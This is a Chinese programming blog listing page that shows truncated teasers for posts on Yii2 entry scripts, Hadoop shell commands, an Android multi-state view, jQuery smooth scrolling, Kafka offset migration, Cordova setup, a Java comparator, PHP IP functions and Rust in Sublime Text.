  • [应用结构]入口脚本 dcj3sjt126com PHPyii2
    入口脚本 入口脚本是应用启动流程中的第一环,一个应用(不管是网页应用还是控制台应用)只有一个入口脚本。终端用户的请求通过入口脚本实例化应用并将将请求转发到应用。 Web 应用的入口脚本必须放在终端用户能够访问的目录下,通常命名为 index.php,也可以使用 Web 服务器能定位到的其他名称。 控制台应用的入口脚本一般在应用根目录下命名为 yii(后缀为.php),该文
  • haoop shell命令 eksliang hadoophadoop shell
    cat chgrp chmod chown copyFromLocal copyToLocal cp du dus expunge get getmerge ls lsr mkdir movefromLocal mv put rm rmr setrep stat tail test text
  • MultiStateView不同的状态下显示不同的界面 gundumw100 android
    只要将指定的view放在该控件里面,可以该view在不同的状态下显示不同的界面,这对ListView很有用,比如加载界面,空白界面,错误界面。而且这些见面由你指定布局,非常灵活。 PS:ListView虽然可以设置一个EmptyView,但使用起来不方便,不灵活,有点累赘。 <com.kennyc.view.MultiStateView xmlns:android=&qu
  • jQuery实现页面内锚点平滑跳转 ini JavaScripthtmljqueryhtml5css
    平时我们做导航滚动到内容都是通过锚点来做,刷的一下就直接跳到内容了,没有一丝的滚动效果,而且 url 链接最后会有“小尾巴”,就像#keleyi,今天我就介绍一款 jquery 做的滚动的特效,既可以设置滚动速度,又可以在 url 链接上没有“小尾巴”。   效果体验:http://keleyi.com/keleyi/phtml/jqtexiao/37.htmHTML文件代码: &
  • kafka offset迁移 kane_xie kafka
    在早前的kafka版本中(0.8.0),offset是被存储在zookeeper中的。   到当前版本(0.8.2)为止,kafka同时支持offset存储在zookeeper和offset manager(broker)中。   从官方的说明来看,未来offset的zookeeper存储将会被弃用。因此现有的基于kafka的项目如果今后计划保持更新的话,可以考虑在合适
  • android > 搭建 cordova 环境 mft8899 android
      1 , 安装 node.js        http://nodejs.org      node -v   查看版本   2, 安装 npm   可以先从  https://github.com/isaacs/npm/tags  下载 源码 解压到
  • java封装的比较器,比较是否全相同,获取不同字段名字 qifeifei
     非常实用的java比较器,贴上代码: import java.util.HashSet; import java.util.List; import java.util.Set; import net.sf.json.JSONArray; import net.sf.json.JSONObject; import net.sf.json.JsonConfig; i
  • 记录一些函数用法 .Aky. 位运算PHP数据库函数IP
    高手们照旧忽略。 想弄个全天朝IP段数据库,找了个今天最新更新的国内所有运营商IP段,copy到文件,用文件函数,字符串函数把玩下。分割出startIp和endIp这样格式写入.txt文件,直接用phpmyadmin导入.csv文件的形式导入。(生命在于折腾,也许你们觉得我傻X,直接下载人家弄好的导入不就可以,做自己的菜鸟,让别人去说吧) 当然用到了ip2long()函数把字符串转为整型数
  • sublime text 3 rust wudixiaotie Sublime Text
    1.sublime text 3 => install package => Rust 2.cd ~/.config/sublime-text-3/Packages 3.mkdir rust 4.git clone https://github.com/sp0/rust-style 5.cd rust-style 6.cargo build --release 7.ctrl